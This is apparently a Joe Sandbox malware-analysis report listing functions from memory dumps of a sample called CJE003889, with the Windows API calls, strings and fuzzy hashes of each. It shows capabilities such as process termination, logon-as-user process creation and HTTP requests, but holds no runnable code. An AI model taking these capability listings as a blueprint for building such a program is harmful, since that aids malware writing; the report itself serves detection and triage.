Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: a9c20956d57985e29db4d0491798b1822903fac056362b7655ac5b93af4e3d5b
Instruction ID: f52ceb8fa3635240c2597dec8f3bf8ea9a708b6fb9be22691ead6891ec6849c5
Opcode Fuzzy Hash: a9c20956d57985e29db4d0491798b1822903fac056362b7655ac5b93af4e3d5b
Instruction Fuzzy Hash: 2B31A372505345ABD720DF14C849F5FB7E9FB88314F00061EF5999B291D770EA45CB92

Function 00CB8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CB80C0
Part of subcall function 00CB80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CB80CA
Part of subcall function 00CB80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CB80D9
Part of subcall function 00CB80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CB80E0
Part of subcall function 00CB80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CB80F6

GetLengthSid.ADVAPI32(?,00000000,00CB842F), ref: 00CB88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CB88D6
HeapAlloc.KERNEL32(00000000), ref: 00CB88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00CB88F6
GetProcessHeap.KERNEL32(00000000,00000000,00CB842F), ref: 00CB890A
HeapFree.KERNEL32(00000000), ref: 00CB8911

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: b1f2a6fbfb40e6cb6edc85f4879bfe6737e4d43512ac4976a845c7348c219f4f
Instruction ID: 631f0f81810250e07907f4e1fe34764a44c7b29bd41d1a40f12aaa3dc51514e8
Opcode Fuzzy Hash: b1f2a6fbfb40e6cb6edc85f4879bfe6737e4d43512ac4976a845c7348c219f4f
Instruction Fuzzy Hash: 2211AF31901209FFDF119FA4DC49BFE7B6CEB45311F10802DE89597150CB329A09DB60

Function 00CB85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00CB85E2
OpenProcessToken.ADVAPI32(00000000), ref: 00CB85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00CB85F8
CloseHandle.KERNEL32(00000004), ref: 00CB8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CB8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00CB8646

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 5f4e209c5268d64fbb5011381af6b19d08eb7ef7c9999737ccbb945ba08d15b7
Instruction ID: 95b0be990600790f1f8de558992f5a6ab95e868e3cae789959b96d60d469c31f
Opcode Fuzzy Hash: 5f4e209c5268d64fbb5011381af6b19d08eb7ef7c9999737ccbb945ba08d15b7
Instruction Fuzzy Hash: 89114A7250124DABDF128FA4DD89FDE7BA9EF48304F044069FE04A6160C7718E65DB60

Function 00CBB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00CBB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00CBB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBB7CD
ReleaseDC.USER32(00000000,00000000), ref: 00CBB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00CBB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00CBB7FE

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: 8b272515bf511ec6179e03109c054c4125debf3aa172a13243fbc85d17206d29
Instruction ID: 97aefc822baa313914b91f03e98e0ac40ee962382176842555d4fba2f445d9a7
Opcode Fuzzy Hash: 8b272515bf511ec6179e03109c054c4125debf3aa172a13243fbc85d17206d29
Instruction Fuzzy Hash: 61018875E00249BBEB105BA69C85B9EBFB8EB48311F004075FA04EB291D6709D01CF61

Function 00C80162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C80193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C8019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C801A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C801B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C801B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C801C1

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 23673dbe6ee912c554e6984293ea55150f1f938bc266ab80b91062f4e4ddbbe8
Instruction ID: 5db3780c99e6e348a8a6446e6d1746b31e023433c031197b8387fda6cf204ee7
Opcode Fuzzy Hash: 23673dbe6ee912c554e6984293ea55150f1f938bc266ab80b91062f4e4ddbbe8
Instruction Fuzzy Hash: 5D0148B09017597DE3008F5A8C85B56FEA8FF19354F00411BA1584B941C7B5A864CBE5

Function 00CC53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00CC53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00CC540F
GetWindowThreadProcessId.USER32(?,?), ref: 00CC541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CC542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CC5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00CC543E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 40e766056ead83b23a641f23ed9bcd649fbb004413a58740c8b2eb537b80bfd1
Instruction ID: ce2b063c7208204e52c7072a21a82d435fdb74646a83a9bc1fd903c13c656bac
Opcode Fuzzy Hash: 40e766056ead83b23a641f23ed9bcd649fbb004413a58740c8b2eb537b80bfd1
Instruction Fuzzy Hash: F8F03032241598BBE7215BA2DC4DFEF7B7CEFC6B11F00016DFA04D50A1D7A11A0286B5

Function 00CC7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00CC7243
EnterCriticalSection.KERNEL32(?,?,00C70EE4,?,?), ref: 00CC7254
TerminateThread.KERNEL32(00000000,000001F6,?,00C70EE4,?,?), ref: 00CC7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00C70EE4,?,?), ref: 00CC726E

Part of subcall function 00CC6C35: CloseHandle.KERNEL32(00000000,?,00CC727B,?,00C70EE4,?,?), ref: 00CC6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00CC7281
LeaveCriticalSection.KERNEL32(?,?,00C70EE4,?,?), ref: 00CC7288

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 807b8e8e942fe35222ad5412b742ed15305c845153a9eeddbabb7a46eb83b5ca
Instruction ID: 9c421bcfb971e3bdcbda79ddc6e899d6e95ad999a69ea5f704a57b37ffb6a39b
Opcode Fuzzy Hash: 807b8e8e942fe35222ad5412b742ed15305c845153a9eeddbabb7a46eb83b5ca
Instruction Fuzzy Hash: 78F05E36540752EBD7111B64ED8CFEE7729FF45702B110639F603990A1CB765902CB50

Function 00CB8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB899D
UnloadUserProfile.USERENV(?,?), ref: 00CB89A9
CloseHandle.KERNEL32(?), ref: 00CB89B2
CloseHandle.KERNEL32(?), ref: 00CB89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00CB89C3
HeapFree.KERNEL32(00000000), ref: 00CB89CA

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: bfaf944197f21bff3dc75c030e09dce5a3ae93a2248a2371a668a2d55edb7764
Instruction ID: fcf2b51665098104378e41b582eb6f507e60da70d1562f68f49bf081e9908693
Opcode Fuzzy Hash: bfaf944197f21bff3dc75c030e09dce5a3ae93a2248a2371a668a2d55edb7764
Instruction Fuzzy Hash: 25E0C236004145FBDA021FE1EC4CB1EBB69FB89322B108238F219890B0CB329462DB50

Function 00CD85ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CD8613
CharUpperBuffW.USER32(?,?), ref: 00CD8722
VariantClear.OLEAUT32(?), ref: 00CD889A

Part of subcall function 00CC7562: VariantInit.OLEAUT32(00000000), ref: 00CC75A2
Part of subcall function 00CC7562: VariantCopy.OLEAUT32(00000000,?), ref: 00CC75AB
Part of subcall function 00CC7562: VariantClear.OLEAUT32(00000000), ref: 00CC75B7

Strings

Incorrect Parameter format, xrefs: 00CD864B, 00CD880D
AUTOIT.ERROR, xrefs: 00CD8728

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 326d55b50dff2decebc35b75a1517b14cb71feae9f89809489e01e80703a79ab
Instruction ID: cc67606fec0a435668971a757714791edb9c2abd49cb7bc72fd27935dd6036be
Opcode Fuzzy Hash: 326d55b50dff2decebc35b75a1517b14cb71feae9f89809489e01e80703a79ab
Instruction Fuzzy Hash: 02918E71604301DFC710DF25C48495ABBF4EF89714F14896EF99A8B3A1DB31E90ADB92

Function 00CC2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C7FC86: _wcscpy.LIBCMT ref: 00C7FCA9

_memset.LIBCMT ref: 00CC2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CC2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00CC2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00CC2C97

Strings

0, xrefs: 00CC2B73

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 0f06dd7d3c4debf70a1892fc283d1fe8d972f06e79c215e952a3bf79010a3035
Instruction ID: 912dffcf72fc1097077a68d4cf18208d21f16009643ba4a755b5ae14db98a19c
Opcode Fuzzy Hash: 0f06dd7d3c4debf70a1892fc283d1fe8d972f06e79c215e952a3bf79010a3035
Instruction Fuzzy Hash: B351AF715083019BE724EE28D885F6FBBE4EF59354F140A2DF8A5D6290DB70CE449762

Function 00CBD56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00CBD5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00CBD60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00CBD61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00CBD69D

Strings

DllGetClassObject, xrefs: 00CBD610

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 65dd6597d917eb5eb27484ab2f6b80f627f8487dbecba232d53b9e0ed9074c9f
Instruction ID: 2d2613bb413558594547a5acad333deff50190f7fb3d3a755479184e5c1377ea
Opcode Fuzzy Hash: 65dd6597d917eb5eb27484ab2f6b80f627f8487dbecba232d53b9e0ed9074c9f
Instruction Fuzzy Hash: 1C417FB5600208EFDB15CF54C888BDA7BB9EF48310F1585ADBD0A9F255E7B1DA44CBA0

Function 00CC2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00CC27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00CC2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00D25890,00000000), ref: 00CC286B

Strings

0, xrefs: 00CC27B5

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 976cd97d2d92c160861a556ca8178c5f59db1a7cec6132c82723b4c65709b1fa
Instruction ID: 80486e8e70ebf39046ea5e93012f5007b64f176c4d08e196a491557dfac5c1d5
Opcode Fuzzy Hash: 976cd97d2d92c160861a556ca8178c5f59db1a7cec6132c82723b4c65709b1fa
Instruction Fuzzy Hash: F841AF722043419FDB20EF24D884F6ABBE8EF85314F144A2EF9A5972D1D730E905DB62

Function 00CDD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00CDD7C5

Part of subcall function 00C6784B: _memmove.LIBCMT ref: 00C67899

Strings

winapi, xrefs: 00CDD836
none, xrefs: 00CDD8A0
cdecl, xrefs: 00CDD81C
stdcall, xrefs: 00CDD847

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 73052c664a90e4951567ff19a5999ccc1d682335481d4bb2a99a40ed28afb2eb
Instruction ID: dec494cb03c416600f26a053f63d4290654ce34b5423c24eaa699b5aaacf9861
Opcode Fuzzy Hash: 73052c664a90e4951567ff19a5999ccc1d682335481d4bb2a99a40ed28afb2eb
Instruction Fuzzy Hash: D7317C71904215ABCB10EF54CC919EEB3B4BF14324B108A2AF976977D1DB31A909EB90

Function 00CB8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C67DE1: _memmove.LIBCMT ref: 00C67E22

Part of subcall function 00CBAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00CBAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00CB8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00CB8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00CB8F57

Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06

Strings

ListBox, xrefs: 00CB8ED3
ComboBox, xrefs: 00CB8E9E

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: ca97650483aa30a69b20d8c794ef4d3c69b06769d5573be36e807fe72baa6fba
Instruction ID: 94428fa96092270f0073b4148591f9ed4785d1b70df4f021e03fff961beed067
Opcode Fuzzy Hash: ca97650483aa30a69b20d8c794ef4d3c69b06769d5573be36e807fe72baa6fba
Instruction Fuzzy Hash: 6721EE71A00108BBDB24ABA08C859FEB77DDF55320F104629B421961E1DE39490AEA20

Function 00CD182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CD184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CD1872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00CD18A2
InternetCloseHandle.WININET(00000000), ref: 00CD18E9

Part of subcall function 00CD2483: GetLastError.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD2498
Part of subcall function 00CD2483: SetEvent.KERNEL32(?,?,00CD1817,00000000,00000000,00000001), ref: 00CD24AD

Strings

, xrefs: 00CD1893

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 12f8c41a50b25e8aa3db0c974ad4cea91d0eaee749e30baf9208f6974b21855d
Instruction ID: e4fe91947bb383e51c31443db59e21f1a75045eb7d59151bfcc232aafc93b7e4
Opcode Fuzzy Hash: 12f8c41a50b25e8aa3db0c974ad4cea91d0eaee749e30baf9208f6974b21855d
Instruction Fuzzy Hash: 7421BEB1500208BFEB11DB61DC85FBF77EDEB88754F15412BFA05A6280EA309E05A7A0

Function 00CE63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C61D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C61D73
Part of subcall function 00C61D35: GetStockObject.GDI32(00000011), ref: 00C61D87
Part of subcall function 00C61D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C61D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00CE6461
LoadLibraryW.KERNEL32(?), ref: 00CE6468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00CE647D
DestroyWindow.USER32(?), ref: 00CE6485

Strings

SysAnimate32, xrefs: 00CE643C

Memory Dump Source

Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 7f38eb8afe15e5eb736b120d798dbf3d303a5f24a04700bbb718d395bc16c29b
